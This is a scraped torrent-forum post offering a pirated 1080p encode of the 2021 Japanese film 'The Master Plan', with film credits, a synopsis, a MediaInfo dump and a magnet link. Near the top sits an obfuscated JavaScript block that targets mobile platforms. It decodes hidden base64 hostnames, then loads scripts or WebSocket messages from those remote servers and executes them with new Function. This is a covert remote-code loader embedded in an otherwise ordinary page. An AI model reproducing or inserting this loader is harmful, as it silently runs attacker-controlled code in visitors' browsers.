无名世界的终结[中文字幕].The.Master.Plan.2021.Bluray.1080p.x265.10bit.DDP.5.1.MNHD 6.00GB

版主小s 1月前 305

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 无名世界的终结 / 无名世界的片尾
◎片  名 名も無き世界のエンドロール
◎年  代 2021
◎产  地 日本
◎类  别 剧情 / 悬疑
◎语  言 日语
◎上映日期 2021-01-29(日本)
◎IMDb链接 https://www.imdb.com/title/tt14393202/
◎豆瓣评分 6.6/10 (842人评价)
◎豆瓣链接 https://movie.douban.com/subject/34801934/
◎片  长 101分钟
◎导  演 佐藤祐市 Y?ichi Sat? (id:1303517)
◎编  剧 西条光利 Mitsutoshi Saijo (id:1376927)
◎演  员 岩田刚典 Takanori Iwata (id:1343114)
       新田真剑佑 Mackenyu Arata (id:1350197)
       山田杏奈 Anna Yamada (id:1364327)
       中村安奈 Anne Nakamura (id:1329797)
       石丸谦二郎 Kenjir? Ishimaru (id:1111349)
       大友康平 Kohei Otomo (id:1275645)
       柄本明 Akira Emoto (id:1042056)

◎标  签 日本 / 岩田刚典 / 日本电影 / 2021 / 新田真剑佑 / 日影 / 电影 / 山田杏奈

◎简  介
  该片改编自同名小说,讲述Kida、Makoto、Yochi三人同为无父无母的孤儿,他们三人相互支撑度过了幸福的少年时期,但在20岁事却以“某件事”为契机,他们的人生发生剧变。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 29526186094997629185890741023817151056 (0x1636895E3FFED3BC550AAA9D92E13250)

  4. Complete name                            : [email protected]BBQDDQ.COM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 6.00 GiB

  8. Duration                                 : 1 h 40 min

  9. Overall bit rate                         : 8 518 kb/s

  10. Movie name                               : The Master Plan [2021] - frds

  11. Encoded date                             : UTC 2021-08-14 02:46:34

  12. Writing application                      : mkvmerge v56.1.0 ('My Friend') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@High

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 40 min

  23. Bit rate                                 : 7 461 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 960 pixels

  26. Display aspect ratio                     : 2.000

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.169

  33. Stream size                              : 5.26 GiB (88%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit

  35. Encoding settings                        : rc=crf / crf=19.5000 / qcomp=0.65 / qpstep=4 / stats-write=0 / stats-read=0 / vbv-maxrate=160000 / vbv-bufsize=160000 / vbv-init=0.9 / min-vbv-fullness=50.0 / max-vbv-fullness=80.0 / crf-max=0.0 / crf-min=0.0 / no-lossless / no-cu-lossless / aq-mode=2 / aq-strength=0.90 / cbqpoffs=-2 / crqpoffs=-2 / ipratio=1.30 / pbratio=1.20 / psy-rd=1.50 / psy-rdoq=1.00 / deblock=-3:-3 / ref=4 / limit-refs=0 / no-limit-modes / bframes=6 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=1 / max-keyint=250 / rc-lookahead=80 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=32 / min-cu-size=8 / me=3 / subme=7 / merange=44 / rdoq-level=2 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / no-cutree / no-sao / no-rect / no-amp / no-open-gop / wpp / pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=4 / tu-intra-depth=4 / limit-tu=0 / qg-size=8 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=3 / numa-pools=14 / log-level=2 / input-csp=1 / input-res=1920x960 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / no-aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=5 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=0 / no-early-skip / no-rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=1 / transfer=1 / colormatrix=1 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No

  38. Color range                              : Limited

  39. Color primaries                          : BT.709

  40. Transfer characteristics                 : BT.709

  41. Matrix coefficients                      : BT.709


  42. Audio

  43. ID                                       : 2

  44. Format                                   : E-AC-3

  45. Format/Info                              : Enhanced AC-3

  46. Commercial name                          : Dolby Digital Plus

  47. Codec ID                                 : A_EAC3

  48. Duration                                 : 1 h 40 min

  49. Bit rate mode                            : Constant

  50. Bit rate                                 : 1 023 kb/s

  51. Channel(s)                               : 6 channels

  52. Channel layout                           : L R C LFE Ls Rs

  53. Sampling rate                            : 48.0 kHz

  54. Frame rate                               : 93.750 FPS (512 SPF)

  55. Compression mode                         : Lossy

  56. Stream size                              : 738 MiB (12%)

  57. Language                                 : Japanese

  58. Service kind                             : Complete Main

  59. Default                                  : Yes

  60. Forced                                   : No


  61. Text #1

  62. ID                                       : 3

  63. ID in the original source medium         : 4608 (0x1200)

  64. Format                                   : PGS

  65. Muxing mode                              : zlib

  66. Codec ID                                 : S_HDMV/PGS

  67. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  68. Duration                                 : 1 h 37 min

  69. Bit rate                                 : 31.6 kb/s

  70. Count of elements                        : 2080

  71. Stream size                              : 21.9 MiB (0%)

  72. Title                                    : chs

  73. Language                                 : Chinese

  74. Default                                  : Yes

  75. Forced                                   : No

  76. Original source medium                   : Blu-ray


  77. Text #2

  78. ID                                       : 4

  79. ID in the original source medium         : 4609 (0x1201)

  80. Format                                   : PGS

  81. Muxing mode                              : zlib

  82. Codec ID                                 : S_HDMV/PGS

  83. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  84. Duration                                 : 1 h 37 min

  85. Bit rate                                 : 34.0 kb/s

  86. Count of elements                        : 2080

  87. Stream size                              : 23.6 MiB (0%)

  88. Title                                    : cht

  89. Language                                 : Chinese

  90. Default                                  : No

  91. Forced                                   : No

  92. Original source medium                   : Blu-ray


  93. Menu

  94. 00:00:00.000                             : CHAPTER:01

  95. 00:05:26.367                             : CHAPTER:02

  96. 00:16:24.024                             : CHAPTER:03

  97. 00:22:56.249                             : CHAPTER:04

  98. 00:31:02.193                             : CHAPTER:05

  99. 00:43:06.000                             : CHAPTER:06

  100. 00:49:33.220                             : CHAPTER:07

  101. 00:58:00.685                             : CHAPTER:08

  102. 01:03:35.561                             : CHAPTER:09

  103. 01:09:05.933                             : CHAPTER:10

  104. 01:19:35.103                             : CHAPTER:11

  105. 01:37:45.860                             : CHAPTER:12



TAGS 剧情 悬疑

磁力链:
  • magnet:?xt=urn:btih:0451DC12062FFDC8CC20F0ED1172A2115AF9AECC

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖